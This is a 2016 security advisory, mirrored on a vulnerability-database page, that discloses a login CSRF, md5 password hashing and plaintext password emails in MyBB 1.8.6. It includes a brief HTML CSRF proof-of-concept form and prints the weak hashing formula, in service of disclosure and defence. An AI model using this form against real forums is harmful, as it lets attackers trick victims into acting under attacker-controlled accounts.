Lucene search
K

MyBB 1.8.6 Cross Site Request Forgery / Weak Hashing

🗓️ 16 Sep 2016 00:00:00Reported by Tim CoenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

MyBB 1.8.6 CSRF and Weak Hashing Vulnerabilitie

Code
`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: MyBB 1.8.6  
Fixed in: not fixed  
Fixed Version Link: n/a  
Vendor Website: http://www.mybb.com/  
Vulnerability Type: CSRF, Weak Hashing, Plaintext Passwords  
Remote Exploitable: Yes  
Reported to vendor: 01/29/2016  
Disclosed to public: 09/15/2016  
Release mode: Full Disclosure / Informational  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
MyBB 1.8.6 is vulnerable to login CSRF. Additionally, it stores passwords using  
weak hashing, and sends passwords via email in plaintext.  
  
3. Login CSRF  
  
Description  
  
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N  
  
The login of MyBB does not have any CSRF protection. The impact of this is low,  
but a victim could provide sensitive information under a fake account. An  
example would be the accidental sending of a sensitive private message while  
being logged into an account controlled by an attacker.  
  
Additionally, a login CSRF makes it possible to exploit possible  
vulnerabilities in the user area, such as XSS.  
  
Proof of Concept  
  
<html> <body> <form action="http://localhost/mybb_1806/Upload/member.php"  
method="POST"> <input type="hidden" name="action" value="do_login" /> <input  
type="hidden" name="url" value="http://localhost/mybb_1806/Upload/index.php" />  
<input type="hidden" name="quick_login" value="1" /> <input type="hidden" name=  
"quick_username" value="admin" /> <input type="hidden" name="quick_password"  
value="admin" /> <input type="hidden" name="quick_remember" value="yes" />  
<input type="hidden" name="submit" value="Login" /> <input type="submit" value=  
"Submit request" /> </form> </body> </html>  
  
4. Weak Hashing  
  
Description  
  
MyBB uses md5 for hashing passwords, which is not considered secure.  
  
The hashing used is:  
  
$hash = md5(md5($salt).md5($password));  
  
5. Passwords Emailed in Plaintext  
  
Description  
  
When passwords are reset, the generated 8 character password is send to the  
user via email in plaintext. It is suggested that users change these passwords,  
but a change is not required.  
  
It is recommended to use a password reset token instead, and to force the user  
to create a new password themselves.  
  
6. Solution  
  
This issue was not fixed by the vendor.  
  
7. Report Timeline  
  
01/29/2016 Informed Vendor about Issue  
02/26/2016 Vendor requests more time  
03/11/2016 Vendor releases new version  
03/15/2016 Requested information about unfixed issues  
03/15/2016 Vendor considers issues minor and will not fix them for now  
09/15/2016 Disclosed to public  
  
  
Blog Reference:  
https://www.curesec.com/blog/article/blog/MyBB-186-CSRF-Weak-Hashing-Plaintext-Passwords-161.html  
  
--  
blog: https://www.curesec.com/blog  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Josef-Orlopp-StraAe 54  
10365 Berlin, Germany  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Sep 2016 00:00Current
0.4Low risk
Vulners AI Score0.4
34